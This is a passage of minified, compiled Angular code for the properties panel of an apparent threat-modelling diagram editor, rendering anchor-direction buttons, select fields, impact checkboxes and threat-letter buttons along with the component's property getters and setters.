 "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function fdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function pdt(t,a){if(1&t){const e=Ye();fi(),s(0,"\n            "),ln(),m(1,"div",40),s(2,"\n              "),m(3,"div",41),s(4,"\n                "),m(5,"table"),s(6,"\n                  "),m(7,"tr"),s(8,"\n                    "),m(9,"td"),s(10,"\n                      "),ne(11,sdt,11,2,"button",42),s(12,"\n                    "),u(),s(13,"\n                    "),m(14,"td",43),s(15,"\n                      "),m(16,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.North}))}),s(17,"\n                        "),fi(),m(18,"svg",45),s(19,"\n                          "),it(20,"circle",46),s(21,"\n                          "),it(22,"line",47),s(23,"\n                          "),it(24,"line",48),s(25,"\n                        "),u(),s(26,"\n                      "),u(),s(27,"\n                    "),u(),s(28,"\n                    "),ln(),m(29,"td"),s(30,"\n                      "),ne(31,cdt,11,2,"button",42),s(32,"\n                    "),u(),s(33,"\n                  "),u(),s(34,"\n                  "),m(35,"tr"),s(36,"\n                    "),m(37,"td"),s(38,"\n                      "),m(39,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.West}))}),s(40,"\n                        "),fi(),m(41,"svg",45),s(42,"\n                          "),it(43,"circle",46),s(44,"\n                          "),it(45,"line",47),s(46,"\n                          "),it(47,"line",48),s(48,"\n                        "),u(),s(49,"\n                      "),u(),s(50,"\n                    "),u(),s(51,"\n                    "),ln(),m(52,"td",49),s(53),oe(54,"translate"),u(),s(55,"\n                    "),m(56,"td"),s(57,"\n                      "),m(58,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.East}))}),s(59,"\n                        "),fi(),m(60,"svg",45),s(61,"\n                          "),it(62,"circle",46),s(63,"\n                          "),it(64,"line",47),s(65,"\n                          "),it(66,"line",48),s(67,"\n                        "),u(),s(68,"\n                      "),u(),s(69,"\n                    "),u(),s(70,"\n                  "),u(),s(71,"\n                  "),ln(),m(72,"tr"),s(73,"\n                    "),m(74,"td"),s(75,"\n                      "),ne(76,ldt,11,2,"button",42),s(77,"\n                    "),u(),s(78,"\n                    "),m(79,"td",43),s(80,"\n                      "),m(81,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.South}))}),s(82,"\n                        "),fi(),m(83,"svg",45),s(84,"\n                          "),it(85,"circle",46),s(86,"\n                          "),it(87,"line",47),s(88,"\n                          "),it(89,"line",48),s(90,"\n                        "),u(),s(91,"\n                      "),u(),s(92,"\n                    "),u(),s(93,"\n                    "),ln(),m(94,"td"),s(95,"\n                      "),ne(96,ddt,11,2,"button",42),s(97,"\n                    "),u(),s(98,"\n                  "),u(),s(99,"\n                "),u(),s(100,"\n              "),u(),s(101,"\n              "),m(102,"div",50),s(103,"\n                "),m(104,"table"),s(105,"\n                  "),m(106,"tr"),s(107,"\n                    "),m(108,"td"),s(109,"\n                      "),ne(110,mdt,11,2,"button",42),s(111,"\n                    "),u(),s(112,"\n                    "),m(113,"td",43),s(114,"\n                      "),m(115,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.North}))}),s(116,"\n                        "),fi(),m(117,"svg",45),s(118,"\n                          "),it(119,"circle",46),s(120,"\n                          "),it(121,"line",47),s(122,"\n                          "),it(123,"line",48),s(124,"\n                        "),u(),s(125,"\n                      "),u(),s(126,"\n                    "),u(),s(127,"\n                    "),ln(),m(128,"td"),s(129,"\n                      "),ne(130,udt,11,2,"button",42),s(131,"\n                    "),u(),s(132,"\n                  "),u(),s(133,"\n                  "),m(134,"tr"),s(135,"\n                    "),m(136,"td"),s(137,"\n                      "),m(138,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.West}))}),s(139,"\n                        "),fi(),m(140,"svg",45),s(141,"\n                          "),it(142,"circle",46),s(143,"\n                          "),it(144,"line",47),s(145,"\n                          "),it(146,"line",48),s(147,"\n                        "),u(),s(148,"\n                      "),u(),s(149,"\n                    "),u(),s(150,"\n                    "),ln(),m(151,"td",49),s(152),oe(153,"translate"),u(),s(154,"\n                    "),m(155,"td"),s(156,"\n                      "),m(157,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.East}))}),s(158,"\n                        "),fi(),m(159,"svg",45),s(160,"\n                          "),it(161,"circle",46),s(162,"\n                          "),it(163,"line",47),s(164,"\n                          "),it(165,"line",48),s(166,"\n                        "),u(),s(167,"\n                      "),u(),s(168,"\n                    "),u(),s(169,"\n                  "),u(),s(170,"\n                  "),ln(),m(171,"tr"),s(172,"\n                    "),m(173,"td"),s(174,"\n                      "),ne(175,hdt,11,2,"button",42),s(176,"\n                    "),u(),s(177,"\n                    "),m(178,"td",43),s(179,"\n                      "),m(180,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.South}))}),s(181,"\n                        "),fi(),m(182,"svg",45),s(183,"\n                          "),it(184,"circle",46),s(185,"\n                          "),it(186,"line",47),s(187,"\n                          "),it(188,"line",48),s(189,"\n                        "),u(),s(190,"\n                      "),u(),s(191,"\n                    "),u(),s(192,"\n                    "),ln(),m(193,"td"),s(194,"\n                      "),ne(195,fdt,11,2,"button",42),s(196,"\n                    "),u(),s(197,"\n                  "),u(),s(198,"\n                "),u(),s(199,"\n              "),u(),s(200,"\n              "),m(201,"button",51),he("click",function(){return be(e),Me(B(4).flowMenuIsOpen=!1)}),oe(202,"translate"),s(203,"\n                "),fi(),m(204,"svg",52),s(205,"\n                  "),it(206,"circle",53),s(207,"\n                  "),it(208,"line",54),s(209,"\n                  "),it(210,"line",55),s(211,"\n                "),u(),s(212,"\n              "),u(),s(213,"\n            "),u(),s(214,"\n          ")}if(2&t){const e=B(4);C(1),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(2),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(8),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(14),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(6),ct("\n                      ",re(54,43,"properties.Sender"),"\n                    "),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(10),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(6),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(8),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(14),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(6),ct("\n                      ",re(153,45,"properties.Receiver"),"\n                    "),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(10),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(6),at("matTooltip",re(202,47,"general.Close")),C(5),Rt("stroke",e.theme.IsDarkMode?"white":"black")("fill",e.theme.IsDarkMode?"#333333":"#e7e5e5"),C(2),Rt("stroke",e.theme.IsDarkMode?"white":"black"),C(2),Rt("stroke",e.theme.IsDarkMode?"white":"black")}}function _dt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"button",24,25),he("click",function(){return be(e),Me(B(3).flowMenuIsOpen=!0)}),oe(4,"translate"),s(5,"\n            "),fi(),m(6,"svg",26),s(7,"\n              "),ne(8,adt,1,1,"circle",27),s(9,"\n              "),ne(10,ndt,1,1,"circle",28),s(11,"\n              "),ne(12,odt,1,1,"circle",29),s(13,"\n              "),ne(14,rdt,1,1,"circle",30),s(15,"\n            \n              "),it(16,"circle",31),s(17,"\n              "),it(18,"circle",32),s(19,"\n              "),it(20,"circle",33),s(21,"\n              "),it(22,"circle",34),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n          "),s(26,"\n          "),ne(27,pdt,215,49,"ng-template",35),s(28,"\n          "),ln(),m(29,"button",22),he("click",function(){return be(e),Me(B(3).ChangeDataFlowDirection())}),s(30),oe(31,"translate"),u(),s(32,"\n        "),Mt()}if(2&t){const e=Ti(3),i=B(3);C(2),at("matTooltip",re(4,12,"properties.FlowAnchor")),C(6),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(5),V("cdkConnectedOverlayOrigin",e)("cdkConnectedOverlayOpen",i.flowMenuIsOpen),C(3),ke(re(31,14,"properties.DataFlowChangeDirection"))}}function gdt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetDiagramReference(e))}}function Cdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function ydt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Cdt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetAvailableDataFlowDiagrams())}}function bdt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetDiagramReference(e))}}function Mdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function vdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Mdt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetAvailableDiagrams())}}function Adt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnElementName(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetElementName(e))}}function Tdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetFlowTypeName(e)))}}function Edt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Tdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetFlowTypes())}}function Ddt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function xdt(t,a){if(1&t&&(m(0,"optgroup",58),s(1,"\n            "),ne(2,Ddt,2,2,"option",20),s(3,"\n          "),u()),2&t){const e=a.$implicit,i=B(4);V("label",e.Name),C(2),V("ngForOf",i.GetAvailableInterfaces(e))}}function wdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetInterface(r,n.target.value))}),s(1,"\n          "),s(2,"\n          "),m(3,"option"),s(4),oe(5,"translate"),u(),s(6,"\n          "),ne(7,xdt,4,2,"optgroup",57),s(8,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);let n;V("ngModel",null==(n=i.GetValue(e))?null:n.ID),C(4),ke(re(5,3,"properties.selectNone")),C(3),V("ngForOf",i.GetAvailableDevices())}}function Idt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function Rdt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"mat-select",59),he("selectionChange",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.value))}),s(3,"\n            "),m(4,"input",60),he("keyup",function(n){be(e);const r=B().$implicit,c=B(2);return Me(c.OnSearchMyData(n,c.GetValue(r)))}),oe(5,"translate"),u(),s(6,"\n            "),ne(7,Idt,2,2,"mat-option",61),s(8,"\n          "),u(),s(9,"\n          "),m(10,"button",62),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).AddMyData(n))}),oe(11,"translate"),s(12,"\n            "),m(13,"mat-icon"),s(14,"add"),u(),s(15,"\n          "),u(),s(16,"\n        "),Mt()}if(2&t){const e=B().$implicit,i=B(2);C(2),V("disabled",!e.Editable)("value",i.GetValue(e)),C(2),at("placeholder",re(5,5,"general.Search")),C(3),V("ngForOf",i.GetMyDatas()),C(3),at("matTooltip",re(11,7,"general.Add"))}}function Sdt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",64),he("change",function(){be(e);const n=B().$implicit;return Me(B(2).SetImpactCategory(n))}),u()}if(2&t){const e=B().$implicit;V("checked",B(2).GetImpactCategory(e))}}function kdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetLineTypeName(e)))}}function Pdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,kdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetLineTypes())}}function Odt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function Ndt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Odt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetLMHValues())}}function Ldt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function zdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetPhysicalElement(r,n.target.value))}),s(1,"\n          "),ne(2,Ldt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);let n;V("ngModel",null==(n=i.GetValue(e))?null:n.ID),C(2),V("ngForOf",i.GetAvailablePhysicalElements(i.selectedObject))}}function Wdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Fdt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function Vdt(t,a){if(1&t){const e=Ye();m(0,"mat-select",66),he("selectionChange",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.value))}),s(1,"\n          "),ne(2,Fdt,2,2,"mat-option",61),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("value",i.GetValue(e)),C(2),V("ngForOf",i.GetProtocols())}}function Bdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(B(3).OpenNotes())}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("matBadge",e.NotesBadge())("matBadgeHidden",0==e.NotesBadge().length),C(1),ke(re(2,3,"properties.openNotes"))}}function Hdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(B(3).OpenQuestionnaire())}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("matBadge",e.QuestionnaireBadge())("matBadgeHidden",0==e.QuestionnaireBadge().length),C(1),ke(re(2,3,"properties.openQuestionnaire"))}}function Udt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function qdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetType(r,n.target.value))}),s(1,"\n          "),ne(2,Udt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B(3);V("ngModel",e.GetStencilType()),C(2),V("ngForOf",e.GetAvailableTypes(e.selectedObject))}}function Gdt(t,a){if(1&t){const e=Ye();m(0,"textarea",68),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function jdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Qdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("invalid",i.GetValidator(e)),V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function $dt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n      "),m(2,"td")(3,"span",7),oe(4,"translate"),s(5),oe(6,"translate"),u()(),s(7,"\n      "),m(8,"td"),s(9,"\n        "),s(10,"\n        "),ne(11,Jlt,4,4,"select",8),s(12,"\n        "),s(13,"\n        "),ne(14,Zlt,3,3,"button",9),s(15,"\n        "),s(16,"\n        "),ne(17,edt,1,2,"mat-checkbox",10),s(18,"\n        "),s(19,"\n        "),ne(20,idt,4,4,"select",8),s(21,"\n        "),s(22,"\n        "),ne(23,_dt,33,16,"ng-container",6),s(24,"\n        "),s(25,"\n        "),ne(26,gdt,2,1,"button",11),s(27,"\n        "),ne(28,ydt,4,2,"select",12),s(29,"\n        "),s(30,"\n        "),ne(31,bdt,2,1,"button",11),s(32,"\n        "),ne(33,vdt,4,2,"select",12),s(34,"\n        "),s(35,"\n        "),ne(36,Adt,2,1,"button",11),s(37,"\n        "),s(38,"\n        "),ne(39,Edt,4,4,"select",8),s(40,"\n        "),s(41,"\n        "),ne(42,wdt,9,5,"select",12),s(43,"\n        "),s(44,"\n        "),ne(45,Rdt,17,9,"ng-container",6),s(46,"\n        "),s(47,"\n        "),ne(48,Sdt,1,1,"mat-checkbox",13),s(49,"\n        "),s(50,"\n        "),ne(51,Pdt,4,4,"select",8),s(52,"\n        "),s(53,"\n        "),ne(54,Ndt,4,4,"select",8),s(55,"\n        "),s(56,"\n        "),ne(57,zdt,4,2,"select",12),s(58,"\n        "),s(59,"\n        "),ne(60,Wdt,1,3,"input",14),s(61,"\n        "),s(62,"\n        "),ne(63,Vdt,4,2,"mat-select",15),s(64,"\n        "),s(65,"\n        "),ne(66,Bdt,3,5,"button",16),s(67,"\n        "),s(68,"\n        "),ne(69,Hdt,3,5,"button",16),s(70,"\n        "),s(71,"\n        "),ne(72,qdt,4,2,"select",12),s(73,"\n        "),s(74,"\n        "),ne(75,Gdt,1,3,"textarea",17),s(76,"\n        "),s(77,"\n        "),ne(78,jdt,1,3,"input",14),s(79,"\n        "),s(80,"\n        "),ne(81,Qdt,1,5,"input",18),s(82,"\n      "),u(),s(83,"\n    "),u()),2&t){const e=a.$implicit;C(3),at("matTooltip",re(4,27,e.Tooltip)),C(2),ke(re(6,29,e.DisplayName)),C(6),V("ngIf","Arrow Position"==e.Type),C(3),V("ngIf","Assign Number To Asset"==e.Type),C(3),V("ngIf","Check Box"==e.Type),C(3),V("ngIf","Device Interface Name"==e.Type),C(3),V("ngIf","Data Flow Change Direction"==e.Type),C(3),V("ngIf","Data Flow Diagram Reference"==e.Type&&!e.Editable),C(2),V("ngIf","Data Flow Diagram Reference"==e.Type&&e.Editable),C(3),V("ngIf","Diagram Reference"==e.Type&&!e.Editable),C(2),V("ngIf","Diagram Reference"==e.Type&&e.Editable),C(3),V("ngIf","Element Name"==e.Type),C(3),V("ngIf","Flow Type"==e.Type),C(3),V("ngIf","Interface Element Select"==e.Type),C(3),V("ngIf","Data Select"==e.Type),C(3),V("ngIf","Impact Category"==e.Type),C(3),V("ngIf","Line Type"==e.Type),C(3),V("ngIf","Low Medium High Select"==e.Type),C(3),V("ngIf","Physical Element Select"==e.Type),C(3),V("ngIf","Port Box"==e.Type),C(3),V("ngIf","Protocol Select"==e.Type),C(3),V("ngIf","Open Notes"==e.Type),C(3),V("ngIf","Open Questionnaire"==e.Type),C(3),V("ngIf","Stencil Type"==e.Type),C(3),V("ngIf","Text Area"==e.Type),C(3),V("ngIf","Text Box"==e.Type),C(3),V("ngIf","Text Box Validator"==e.Type)}}function Kdt(t,a){if(1&t){const e=Ye();m(0,"span",70),s(1,"\n            "),m(2,"button",71),he("click",function(){const r=be(e).$implicit;return Me(B(4).AddMnemonicThreat(r))}),s(3),u(),s(4,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(4);C(2),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("primary-color",e.AffectedElementTypes.includes(i.selectedElement.Type.ElementTypeID)),at("matTooltip",i.GetLetterTooltip(e)),C(1),ke(e.Letter)}}function Xdt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3),u(),s(4,"\n        "),m(5,"td"),s(6,"\n          "),ne(7,Kdt,5,6,"span",69),s(8,"\n        "),u(),s(9,"\n      "),u()),2&t){const e=a.$implicit;C(3),ke(e.Name),C(4),V("ngForOf",e.Letters)}}function Ydt(t,a){if(1&t&&(bt(0),s(1,"\n      "),ne(2,Xdt,10,2,"tr",5),s(3,"\n    "),Mt()),2&t){const e=B(2);C(2),V("ngForOf",e.GetMnemonics())}}function Jdt(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n      "),m(2,"td",72)(3,"button",22),he("click",function(){return be(e),Me(B(2).CreateUseCaseDiagram())}),s(4),oe(5,"translate"),u()(),s(6,"\n    "),u()}2&t&&(C(4),ke(re(5,1,"properties.createDataFlowDiagram")))}function Zdt(t,a){if(1&t&&(m(0,"table",2),s(1,"\n    "),m(2,"colgroup"),s(3,"\n      "),it(4,"col",3),s(5,"\n      "),it(6,"col",4),s(7,"\n    "),u(),s(8,"\n    "),ne(9,$dt,84,31,"tr",5),s(10,"\n    "),ne(11,Ydt,4,1,"ng-container",6),s(12,"\n    "),ne(13,Jdt,7,3,"tr",6),s(14,"\n  "),u()),2&t){const e=B();C(9),V("ngForOf",e.selectedObject.GetProperties()),C(2),V("ngIf",e.IsDFDElement()),C(2),V("ngIf",e.IsUseCase())}}let TZ=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.dataService=i,this.dialog=n,this.threatEngine=r,this.locStorage=c,this.router=d,this.activatedRoute=T,this.searchCounter=0,this.AnchorDirections=_i,this.flowMenuIsOpen=!1,this.selectedObjectChanged=new Tt,this.openQuestionnaire=new Tt}get Diagram(){return this.dataObject}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&this.Diagram&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e,this.flowMenuIsOpen=!1,setTimeout(()=>{Array.from(document.getElementsByTagName("textarea")).forEach(i=>{i.style.height="auto",i.style.height=i.scrollHeight.toString()+"px"})},10)}get selectedElement(){return this._selectedObject}get selectedFlow(){return this._selectedObject}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.FocusFirst())}FocusFirst(){const e=document.getElementById("proptable");e&&e.children.length>0&&e.children[1].children.length>0&&e.children[1].children[1].children.length>0&&e.children[1].children[1].children[0].select()}GetValue(e){return"Name"==e.ID?null!=this.selectedObject.Ref?this.selectedObject.Ref.NameRaw:this.selectedObject.NameRaw:this.selectedObject.GetProperty(e.ID)}GetValidator(e){return this.selectedObject[e.Callback]()}SetValue(e,i){this.selectedObject.SetProperty(e.ID,i)}SetType(e,i){if(this.selectedObject instanceof lc){let n=this.dataService.Config.GetStencilTypes().find(r=>r.ID==i);this.selectedObject.SetProperty(e.ID,n)}else console.error("Cant set type of non DFDElement")}SetPhysicalElement(e,i){this.selectedObject instanceof lc&&(this.selectedObject.PhysicalElement=this.dataService.Project.GetDFDElement(i))}GetStencilType(){return this.selectedObject instanceof lc?this.selectedObject.GetProperty("Type").ID:null}GetImpactCategory(e){const i=this.selectedObject.Data[e.ID.split("-")[0]],n=Number(e.ID.split("-")[1]);return i.includes(n)}SetImpactCategory(e){const i=Number(e.ID.split("-")[1]),n=this.selectedObject.Data[e.ID.split("-")[0]],r=n.indexOf(i);r>=0?n.splice(r,1):n.push(i)}GetElementName(e){var i;return null===(i=this.selectedObject.GetProperty(e.ID))||void 0===i?void 0:i.Name}OnElementName(e){let i=this.selectedObject.GetProperty(e.ID);i&&i instanceof Np&&this.selectedObjectChanged.emit(i)}GetDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){let n=this.dataService.Project.GetDiagram(i);if(n)return n.Name}return""}OnDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){const n={viewID:i};this.selectedObject.Ref&&(n.elementID=this.selectedObject.Ref.ID),this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:n,replaceUrl:!0})}}GetAvailableDataFlowDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==xn.DataFlow)}GetAvailableDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==e.DiagramType)}GetAvailablePhysicalElements(e){return e instanceof v2?this.dataService.Project.GetDFDElements().filter(i=>i.IsPhysical&&i.GetProperty("Type").ElementTypeID==e.GetProperty("Type").ElementTypeID+1):e instanceof M5?this.dataService.Project.GetDFDElements().filter(i=>i.Type.ElementTypeID==Et.PhyTrustArea):[]}GetAvailableDevices(){return this.dataService.Project.GetDevices()}GetAvailableInterfaces(e){return e.HardwareDiagram.Elements.GetChildrenFlat().filter(i=>i.GetProperty("Type").ElementTypeID==Et.Interface)}SetInterface(e,i){this.selectedObject.SetProperty(e.ID,this.dataService.Project.GetDFDElement(i))}GetAvailableTypes(e){return e instanceof lc?this.dataService.Config.GetStencilTypes().filter(i=>i.ElementTypeID==e.GetProperty("Type").ElementTypeID):[]}GetProtocols(){return this.dataService.Config.GetProtocols()}AddMyData(e){let i=this.dataService.Project.CreateMyData(null);this.dialog.OpenAddMyDataDialog(i).subscribe(n=>{if(n){let r=this.selectedObject.GetProperty(e.ID);r.push(i),this.selectedObject.SetProperty(e.ID,r)}else this.dataService.Project.DeleteMyData(i)})}GetMyDatas(){return null==this.myDatas&&(this.myDatas=this.dataService.Project.GetMyDatas()),this.myDatas}OnSearchMyData(e,i){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.myDatas=null,this.GetMyDatas();const 